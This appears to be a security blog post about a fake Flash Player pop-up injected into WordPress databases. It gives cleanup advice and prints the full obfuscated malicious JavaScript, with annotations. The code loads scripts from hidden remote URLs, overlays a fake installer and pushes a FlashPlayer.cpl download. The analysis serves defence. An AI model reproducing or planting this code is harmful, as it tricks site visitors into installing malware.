


Adobe FlashPlayer Virus on WordPress Websites


adobe virus

If you have a WordPress website and a window has suddenly started popping up asking visitors to download Adobe Flash Player, that download is a fake.

How do you fix this?

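A virus scan of the files on your server will not find this. It is not a rootkit. Normal scanning methods miss it because the injected script tag is masked as an everyday, ordinary URL and, as described below, it sits in the database rather than in a file.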

You will need to access your database and look for a script that looks like this:

<script src=”http://va.mu/caCS”></script>

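In our case this script was placed inside a Facebook Like widget in the wp_options table. Widget settings are stored there as serialized data in which every string carries a length prefix (the s:42 below is the length of the injected tag plus its line break), so if you edit the row by hand the lengths must still match; deleting the affected widget from the WordPress admin avoids that problem.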

It looked like this:

<div class=”fb-like-box” data-href=”https://www.facebook.com/ourwebsitename?fref=ts” data-width=”220″ data-height=”500″ data-show-faces=”true” data-stream=”true” data-header=”true”></div>
“;s:6:”filter”;b:0;}i:3;a:3:{s:5:”title”;s:1:”
“;s:4:”text”;s:42:”<script src=”http://va.mu/caCS”></script>
“;s:6:”filter”;b:0;}s:12:”_multiwidget”;i:1;}

This script calls a hacked URL, which in this case is  lapetitecuisine. net. br/ Plugin.jar  (SPACES HAVE BEEN PLACED IN THIS URL TO HELP PREVENT ACCIDENTAL ACCESS TO THIS URL)

This Plugin.jar file pulls the fake FlashPlayer.cpl from the following URL:adobe virus URL

 

 

From there the fake FlashPlayer.cpl file installs itself as a Windows Control Panel icon. Beyond that, we are currently unsure of exactly what damage it is capable of causing; further testing is being done.

If you need assistance in removing this virus please don’t hesitate to contact us.

 

For you Geeks out there:

Here is the WHOLE script that is causing the problem. This is the caCS script:

 

// Captured specimen, kept verbatim for analysis.
// NOTE(review): as published, the listing contains typographic quotes and
// dashes, so it does not parse as JavaScript in this form.
//
// Global state shared by the functions below.
// government: string assembled from three fragments, each decoded by jryrktnn()
// with the same key. meCrazy() appends a suffix to it and hands the result to
// callMeEveryWhere(), which uses it as the src of a new <script> element.
var government = jryrktnn(‘/eetojjht:.dpcp.’,’4ADF06946′)+jryrktnn(‘eile/sur.slcut/n’,’4ADF06946′)+jryrktnn(‘s/hteipjnx.hsds’,’4ADF06946′);
// Percentage shown by the progress bar; advanced by doProg() on a timer.
var progress = 0;
// Interval handle: the doProg() timer first, later the allFinish() timer.
var iProg = null;
// Interval handle used by goOut() to bring the overlay back after a close.
var cBack = null;
// Limit compared against count in goOut(); once count reaches it, a close is final.
var cd = 5;
// Number of times goOut() has scheduled the overlay to reappear.
var count = 0;
// When false, goOut() returns immediately, so the overlay cannot be hidden.
var canClose = true;

// Returns the distinct characters of text, in order of first appearance.
// jryrktnn() uses the result as the alphabet of the string it decodes.
// Note: the loop index i is never declared, so it is an implicit global shared
// with the other loops in this listing.
function genAlpha(text)
{
var alpha = “”;
for(i = 0 ; i < text.length; i++)
{
// Append a character only the first time it is seen.
if (alpha.indexOf(text.charAt(i)) == -1)
{
alpha += text.charAt(i);
}
}
return alpha;
}
// Recursive factorial, with the argument clamped to 16 before it is used.
// Returns 1 for 0 and num * rFact(num - 1) otherwise.
// (The minus sign in the published listing is a typographic dash.)
function rFact(num)
{
if (num > 16) num = 16;
if (num === 0) { return 1; } else { return num * rFact( num – 1 ); }
}

// Turns the key string into a number: each character code is added to a
// running total, and the total is multiplied by 10 after every addition for as
// long as it is below 1000000000.
// jryrktnn() reduces the result modulo a factorial to pick a permutation.
function calcKey(key)
{
var c = 0;
for(i = 0 ; i < key.length; i++)
{
c = c+key.charCodeAt(i);
if (c < 1000000000) c = c*10;
}
return c;
}

// Builds a reordering of alpha selected by the number p.
// At each step the remaining value p is divided by the factorial of the number
// of characters still to be placed; the quotient picks the next character, which
// is then removed from alpha, and the remainder carries over to the next step.
// rFact() clamps its argument to 16, so the divisor stops growing for long
// alphabets.
// Note: i, n, k and c are undeclared and therefore implicit globals.
function getNPoss(alpha, p)
{
var resp = “”;
var d = alpha.length;
for(i=1; i <= d; i++)
{
n = rFact(d-i);
k = Math.floor(p/(n));
p = p-(k*n);
c = alpha.charAt(k);
resp += c;
// Remove the chosen character so it cannot be picked again.
alpha = alpha.replace(c,””);
}
return resp;
}

// String decoder used for every obfuscated literal in this listing.
// It is a character substitution over the message's own alphabet:
//   bAlpha = distinct characters of message, in first-seen order
//   aAlpha = a reordering of bAlpha chosen from the key via calcKey()/getNPoss()
// Each character is looked up in aAlpha and replaced by the character at the
// same position in bAlpha.
// Because the URLs, the MIME type and part of the markup only exist in decoded
// form at run time, searching the script text for those values finds nothing.
// For triage, the key strings and the function names in this listing are the
// stable things to search for.
function jryrktnn(message, key)
{

var c = calcKey(key);
var bAlpha = genAlpha(message);
var aAlpha = getNPoss(bAlpha, c%rFact(bAlpha.length) );

var coded, i, ch, index;

coded = “”;
for (i = 0; i < message.length; i++) {
ch = message.charAt(i);
index = aAlpha.indexOf(ch);
coded = coded + bAlpha.charAt(index);
}
return coded;
}

/*** START ***/

// Hover styling for a dialog button.
// Assigns obj.style.background several times in a row: a plain colour, then
// vendor-prefixed gradients, then the unprefixed gradient.
// Wired to the buttons through onMouseOver="btOver(this)" in the injected markup.
function btOver(obj)
{
obj.style.background = “#FF7777”;
obj.style.background = “rgb(60, 60, 60)”;
obj.style.background = “-moz-linear-gradient(90deg, rgb(60, 60, 60) 0%, rgb(80, 80, 80) 70%)”;
obj.style.background = “-webkit-linear-gradient(90deg, rgb(60, 60, 60) 0%, rgb(80, 80, 80) 70%)”;
obj.style.background = “-o-linear-gradient(90deg, rgb(60, 60, 60) 0%, rgb(80, 80, 80) 70%)”;
obj.style.background = “-ms-linear-gradient(90deg, rgb(60, 60, 60) 0%, rgb(80, 80, 80) 70%)”;
obj.style.background = “linear-gradient(180deg, rgb(60, 60, 60) 0%, rgb(80, 80, 80) 70%)”;
}

// Resting (non-hover) styling for a dialog button: border, text colour and the
// same colour/gradient fallback sequence as btOver(), with lighter values.
// Also used by allFinish() to make the final button look enabled.
function btOut(obj)
{
obj.style.border = “1px solid #111”;
obj.style.color = “white”;
obj.style.background = “rgb(100, 100, 100)”;
obj.style.background = “-moz-linear-gradient(90deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%)”;
obj.style.background = “-webkit-linear-gradient(90deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%)”;
obj.style.background = “-o-linear-gradient(90deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%)”;
obj.style.background = “-ms-linear-gradient(90deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%)”;
obj.style.background = “linear-gradient(180deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%)”;
}
// Activates the "CONCLUIR" (finish) button that doProg() writes into the page.
// doProg() schedules this function on an 18000 ms interval, so the button only
// becomes clickable some time after the fake progress bar has completed.
// Note: fim is an implicit global. The hover handlers call btOver()/btOut()
// without an argument, so obj is undefined inside them.
function allFinish()
{
fim = document.getElementById(‘btFinish’);
btOut(fim);
//fim.className = “btInstall”;
// Clicking the button reports back through EndAndOut() and hides the overlay.
fim.onclick = function(){EndAndOut(”)};
fim.onmouseover = function(){btOver()};
fim.onmouseout = function(){btOut()};
}

// Final step of the dialog.
// Re-enables closing, loads one more remote script through meCrazy(), and hides
// the overlay without scheduling it to come back (base = false).
// The decoded literal is appended to the base URL held in government; it is
// presumably a query-string fragment, to be confirmed by decoding it offline.
function EndAndOut(add)
{
window.canClose = true;
meCrazy(jryrktnn(‘?Q36QT56Q=Q’,’DFDA2126068′) + add);
goOut(‘none’, false);
}

// One tick of the fake progress bar.
// Download() runs this every 50 ms, and each tick only adds 1 to progress. The
// bar is driven by the timer alone and is not tied to any actual transfer.
// At 100 it:
//   - sets canClose to false, so goOut() can no longer hide the overlay
//   - replaces the doProg timer with an 18000 ms timer calling allFinish()
//   - swaps the form for a Portuguese message telling the visitor to RUN
//     FlashPlayer.cpl and install the update, plus a greyed "CONCLUIR" button
//   - navigates the window to a URL decoded from three fragments, presumably
//     the download that the message refers to (confirm by decoding offline)
function doProg()
{
if (progress == 100) {
window.canClose = false;
window.iProg = window.clearInterval(window.iProg);
window.iProg = setInterval(function(){allFinish()},18000);
document.getElementById(‘downForm’).innerHTML = ‘<div style=”text-align: right;”><div style=”float: left; font-weight : bold; font-size: 11px; text-align : left;”>Conclu&iacute;do Para prosseguir, EXECUTE o <u style=”color: #5a5; font-size: 14px;”>FlashPlayer.cpl</u> e instale a atualiza&ccedil;&atilde;o. </div><button style=”padding : 6px; width: 120px; border : 1px solid #555; color : #555; margin-left : 10px; background-color : #666;” id=”btFinish” name=”btFinish””><center>CONCLUIR</center></button></div>’;
window.location=jryrktnn(‘baauprrhknel:/kt’,’196B7C8D8FFC6′)+jryrktnn(‘eh/Fc/lrPsakou.a’,’196B7C8D8FFC6′)+jryrktnn(‘alpc.ery’,’196B7C8D8FFC6′);
return;
}
progress += 1;
// Widen the bar and update the "Baixando N%..." (downloading) label.
document.getElementById(‘progBar’).style.width = progress+”%”;
document.getElementById(‘progPer’).innerHTML = “Baixando “+progress+”%…”;
}

// Loads a remote script whose URL is the decoded base in government followed by
// the suffix add (see callMeEveryWhere()).
function meCrazy(add)
{
callMeEveryWhere(government + add);
}

// Click handler of the "INSTALAR" (install) button in the injected dialog.
// Loads a remote script from a URL decoded out of four fragments, hides the
// licence block and the install form, shows the progress form, and starts the
// 50 ms doProg() timer.
// Note: iF and dF are implicit globals.
function Download()
{
callMeEveryWhere(jryrktnn(‘hoo.:ppj.tdec/cd’,’36A3F0B0DE’)+jryrktnn(‘u/.urtslct.isnre’,’36A3F0B0DE’)+jryrktnn(‘h?pdij./texphnhs’,’36A3F0B0DE’)+jryrktnn(‘elu3=ayg=v=c=1w’,’36A3F0B0DE’));

document.getElementById(‘dvLicense’).style.display = “none”;

iF = document.getElementById(‘installForm’);
iF.style.display = “none”;

dF = document.getElementById(‘downForm’);
dF.style.display = “block”;

iProg = setInterval(function(){doProg()},50);
}

// Shows or hides the overlay by setting the display value stilo on the dialog
// container and on the backdrop.
// Parameters:
//   stilo - CSS display value ("none" hides, "block" shows)
//   base  - when true (the default), a hide is temporary and a re-show is scheduled
// Behaviour visible here:
//   - does nothing while canClose is false
//   - after a hide with base true, schedules goOut("block") 6000 ms later, so
//     the dialog reappears after the visitor closes it
//   - once count has reached cd (5), a hide is no longer followed by a re-show
function goOut(stilo, base)
{
if (!canClose) return;
base = typeof base !== ‘undefined’ ? base : true;
document.getElementById(‘xyz_light_cont’).style.display = stilo;
document.getElementById(‘xyz_fade’).style.display = stilo;

// Cancel any pending re-show before deciding whether to schedule a new one.
window.cBack = clearInterval(window.cBack);
if (count >= cd) base = false;
if (!base) return;

if ((stilo == “none”) && (base)) {
count += 1;
window.cBack = setInterval(function(){goOut(“block”)},6000);
}
}

// Appends a <script> element with src = srce to the document head, so the
// browser fetches that URL and runs it in the context of the infected page.
// The type attribute is also a decoded literal.
// Every remote load in this listing goes through this function (Download(),
// and meCrazy() via EndAndOut()).
function callMeEveryWhere(srce)
{
var headID = document.getElementsByTagName(“head”)[0];
var newScript = document.createElement(‘script’);
newScript.type = jryrktnn(‘vejvtirsrxp/cav’,’658936F3113′);
newScript.src = srce;
headID.appendChild(newScript);
}

// Appends a <link rel="stylesheet"> pointing at srce to the document head.
// No call to this function appears in the listing shown here.
function loadCSS(srce)
{
var headID = document.getElementsByTagName(“head”)[0];
var newScript = document.createElement(‘link’);
newScript.setAttribute(“rel”, “stylesheet”);
newScript.setAttribute(“type”, “text/css”);
newScript.setAttribute(“href”, srce);
headID.appendChild(newScript);
}

// Wraps an HTML string in a new <span> by assigning it to innerHTML, and returns
// the span. weCameFromHell() uses it to turn the overlay markup into DOM nodes.
function spawAnyone(html)
{
var span = document.createElement(‘span’);
span.innerHTML = html;
return span;
}

// Inserts the given markup as the first child of document.body, ahead of the
// site's own content. Does nothing if the body does not exist yet.
function weCameFromHell(htcode)
{
var aBody = document.body;
if (aBody)
{
aBody.insertBefore(spawAnyone(htcode), aBody.firstChild);
}
}

// Busy-wait: spins in a loop until delay milliseconds have passed, blocking the
// page's script thread for that time. The only live call passes 0000.
function sleep(delay) {
var start = new Date().getTime();
while (new Date().getTime() < start + delay);
}

// Entry point of the overlay. Started by the cSta timer and runs once, because
// it clears that timer first.
// It prepends two pieces of markup to document.body through weCameFromHell():
//   1. markup decoded at run time from fourteen jryrktnn() fragments; its
//      content is not readable in the listing and has to be decoded offline
//   2. a literal full-page overlay imitating an installer, in Portuguese, titled
//      "Atualiza&ccedil;&atilde;o Adobe Flash Player 11.0.1" (Adobe Flash Player
//      11.0.1 update): a pre-ticked licence checkbox, a link to the genuine
//      adobe.com EULA page, "SAIR" (exit) and "INSTALAR" (install) buttons, a
//      hidden progress form and a dark backdrop
// Element ids in the literal markup, useful when checking a page or a database
// dump for this injection: xyz_light_cont, xyz_light, xyz_fade, dvLicense,
// installForm, downForm, downBar, progBar, progPer.
// Both the X and the SAIR button call goOut(), which brings the dialog back
// after 6000 ms, so closing it is only temporary.
// Note: url is an implicit global and its statement has no semicolon. The long
// string below is broken across several lines in the published listing.
function ljkmvkuic()
{
window.cSta = window.clearInterval(window.cSta);
// Decoded base URL; used below only as the prefix of the logo image (logo.png).
url = jryrktnn(‘j::/etth/cpod.dp’,’592A42605D2′)+jryrktnn(‘sresiluntle/uci.’,’592A42605D2′)+jryrktnn(‘pjts/.’,’592A42605D2′)
sleep(0000);
weCameFromHell(jryrktnn(‘nm==” aelmt p<<e’,’C98A03AB1′)+jryrktnn(‘oe.las1c”=emd 1′,’C98A03AB1’)+jryrktnn(‘rrh”tp:=avipeec ‘,’C98A03AB1’)+jryrktnn(‘ccusnilelipteae/’,’C98A03AB1′)+jryrktnn(‘tlutgliP.rb/neul’,’C98A03AB1′)+jryrktnn(‘r e=vvilatsy=”ji’,’C98A03AB1′)+jryrktnn(‘tdten;hb:tyy lib’,’C98A03AB1′)+jryrktnn(‘0;eg iht:h d;w g’,’C98A03AB1′)+jryrktnn(‘parm< aaa”;>0>:a’,’C98A03AB1′)+jryrktnn(‘ek vuia”e=ilmkan’,’C98A03AB1′)+jryrktnn(‘”taurrnl==:p/h”e’,’C98A03AB1′)+jryrktnn(‘kr/Flsuasc/.oerb’,’C98A03AB1′)+jryrktnn(‘hlyr> </”ayc.peP’,’C98A03AB1′)+jryrktnn(‘/lelt<a>ml// rp<‘,’C98A03AB1’) + ‘<div id=”xyz_light_cont” style=”display : block; position : absolute; text-align : center; top : 0; left: 0; width : 103%; height : 103%; z-index : 9002; background : none;”><div id=”xyz_light” style=”display : block; margin : 0 auto; margin-top : 130px; width : 600px; padding : 0; border : 8px solid #8badf9; border-top : none; z-index : 9003; overflow : auto; font-family : Tahoma; font-size : 11px; color : black; text-align : center; background-color : white; border-radius : 5px;”><div style=”font-weight : bold; font-size : 12px; color: #000; padding: 10px 0; text-align: center; background-color: #8badf9;”>Atualiza&ccedil;&atilde;o Adobe Flash Player 11.0.1 <div style=”width : 30px; height : 14px; color : white; padding : 3px; float : right; margin-top : -10px; background: #aa0000; background: -moz-linear-gradient(top, #aa0000 0%, #cc0000 100%); background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#aa0000), color-stop(100%,#cc0000)); background: -webkit-linear-gradient(top, #aa0000 0%,#cc0000 100%); background: -o-linear-gradient(top, #aa0000 0%,#cc0000 100%); background: -ms-linear-gradient(top, #aa0000 0%,#cc0000 100%); background: linear-gradient(to bottom, #aa0000 0%,#cc0000 100%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\’#aa0000\’, endColorstr=\’#cc0000\’,GradientType=0 ); ” 
onClick=”javascritp:goOut(\’none\’,true);”>X</div></div><div style=”padding: 6px; background-color: #333; color: white; border: 1px solid #222;”><div style=”padding: 10px 0; text-align: center;”><img style=”margin: 20px; padding: 0;” src=”‘+url+’logo.png” /></br></div><div name=”dvLicense” id=”dvLicense” style=”margin: 0 10% 20px 10% ; text-align: left;”><input type=”checkbox” style=”float: left;” checked=”true”/><div style=”margin-left: 20px; font-size: 13px;”>Li e concordo com os termos do contrato de licen&ccedil;a do Adobe Flash Player. </br><a style=”color: white; text-decoration: underline;” href=”http://www.adobe.com/br/products/eulas/”>Leia a licen&ccedil;a aqui</a></div></div><hr style=”border : none; border-top : 1px solid #222; border-bottom : 1px solid #444;”/><div id=”installForm” style=”padding : 10px 0 10px 0; color : #eee; font-weight : bold; font-size: 13px; text-align : left;”><table style=”width: 100%; color : #eee; font-weight : bold; font-size: 13px; text-align : left;” border=”0″><tr style=”display: block-inline;”><td>Atualiza&ccedil;&atilde;o do Adobe Flash Player necess&aacute;ria.</td><td style=”text-align: right;”><button style=”margin-left : 10px; padding : 6px; width : 120px; border : 1px solid #111; color : white; background : rgb(100, 100, 100); background : -moz-linear-gradient(90deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%); background : -webkit-linear-gradient(90deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%); background : -o-linear-gradient(90deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%); background : -ms-linear-gradient(90deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%); background : linear-gradient(180deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%);” name=”btOut” onclick=”javascript: goOut(\’none\’);” onMouseOver=”javascript: btOver(this);” onMouseOut=”javascript: btOut(this);”>SAIR</button><button style=”margin-left : 10px; padding : 6px; width : 120px; border : 1px solid #111; color : white; background : rgb(100, 100, 
100); background : -moz-linear-gradient(90deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%); background : -webkit-linear-gradient(90deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%); background : -o-linear-gradient(90deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%); background : -ms-linear-gradient(90deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%); background : linear-gradient(180deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%);” name=”btInstall” onClick=”javascript: Download();” onMouseOver=”javascript: btOver(this);” onMouseOut=”javascript: btOut(this);”>INSTALAR</button></td></tr></table></div><div id=”downForm” style=”display: none; padding : 10px 0 10px 0; color : #eee; font-weight : bold; text-align : left;”><div id=”progPer” style=”font-weight : bold; font-size: 12px; text-align : left;”>Baixando 0%…</div><div id=”downBar” style=”border-radius : 10px; color: white; width : 100%; height : 10px; background-color : #444; border : 1px solid black; box-shadow:inset 0 0 10px #111;”><div id=”progBar” style=”height : 10px; border-radius : 10px;background: #1e5799; background: -moz-linear-gradient(top, #1e5799 0%, #2989d8 50%, #207cca 51%, #7db9e8 100%); background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#1e5799), color-stop(50%,#2989d8), color-stop(51%,#207cca), color-stop(100%,#7db9e8)); background: -webkit-linear-gradient(top, #1e5799 0%,#2989d8 50%,#207cca 51%,#7db9e8 100%); background: -o-linear-gradient(top, #1e5799 0%,#2989d8 50%,#207cca 51%,#7db9e8 100%); background: -ms-linear-gradient(top, #1e5799 0%,#2989d8 50%,#207cca 51%,#7db9e8 100%); background: linear-gradient(to bottom, #1e5799 0%,#2989d8 50%,#207cca 51%,#7db9e8 100%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\’#1e5799\’, endColorstr=\’#7db9e8\’,GradientType=0 );”></div></div></div></div></div></div><div id=”xyz_fade” style=”display : block; position : absolute; top : 0; left : 0; width : 100%; height : 800px; z-index : 9001; -moz-opacity : 0.6; opacity 
: .60; filter : alpha(opacity=60); background-color: black;”></div></body>’);
// The automatic start of Download() is commented out in this capture, so the
// download flow begins only when the visitor clicks INSTALAR.
//sleep(1000);
//Download();
}

// Starts the overlay: ljkmvkuic() fires 6337 ms after this script loads and
// clears this interval on entry, so the dialog is injected once, a few seconds
// after the page has appeared.
var cSta = setInterval(function(){ljkmvkuic()},6337);
